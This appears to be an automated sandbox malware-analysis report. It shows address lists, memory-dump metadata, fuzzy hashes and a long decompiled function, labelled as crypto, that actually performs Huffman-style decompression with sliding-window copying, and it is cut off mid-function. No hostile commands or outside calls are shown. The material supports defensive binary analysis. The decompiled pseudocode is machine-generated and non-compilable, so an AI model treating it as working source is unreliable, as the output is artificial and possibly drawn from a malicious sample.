0x00845c83
0x00845c89
0x00845c8c
0x00845c8c
0x00845c8c
0x00845c8e
0x00000000
0x00000000
0x00845c90
0x00845c90
0x00845c91
0x00845c94
0x00845c97
0x00000000
0x00000000
0x00845c99
0x00000000
0x00845c99
0x00845c9b
0x00845c9b
0x00000000
0x00845c51
0x00845c51
0x00845c53
0x00845c56
0x00845c60
0x00845c68
0x00845c6e
0x00845c71
0x00845cd9
0x00845cdc
0x00845cdc
0x00845cde
0x00000000
0x00845cde
0x00845c4f
0x00845bee
0x00845b3c
0x00845a91
0x00845a91
0x00845a98
0x00845ab6
0x00845abc
0x00845ac1
0x00845ac4
0x00000000
0x00845ac4
0x00845a9a
0x00845aa7
0x00845aaf
0x00000000
0x00845aaf
0x00845a02
0x008459a8
0x008459a8
0x008459aa
0x00000000
0x00000000
0x008459ac
0x008459ae
0x008459b3
0x008459b9
0x008459bf
0x00000000
0x00000000
0x008459c5
0x008459c5
0x008459d9
0x008459d9
0x008459e0
0x008462d4
0x008462d4
0x00000000
0x008462d4
0x00000000
0x008459e0
0x008459c7
0x008459c7
0x008459cd
0x008459d3
0x00000000
0x00000000
0x00000000
0x008459d3
0x00845914

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1559ca55a766eced205777f0cbd48babf2eebb01b9a335437c855069058ddeba
Instruction ID: ba7fd9b26d4d6adf47daf067d56b0f108571bb8a3fc5e01f8c9880941e6ea00b
Opcode Fuzzy Hash: 1559ca55a766eced205777f0cbd48babf2eebb01b9a335437c855069058ddeba
Instruction Fuzzy Hash: C162D471604B8D9FCB29CF28C8906B9BBE1FF55304F08896ED89ACB347D634A959C711

Uniqueness

Uniqueness Score: -1.00%

Function 00846D4E, Relevance: .8, Instructions: 773
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00846D4E(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E0083A591(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E0083A591(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E0083A591(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E0084EA80(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E0084EA80(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E008435D7(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E00841A81(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E0083A591(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E0083A591(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E0084EA80(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E00847DE9(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E00847DE9(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E0083A591(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
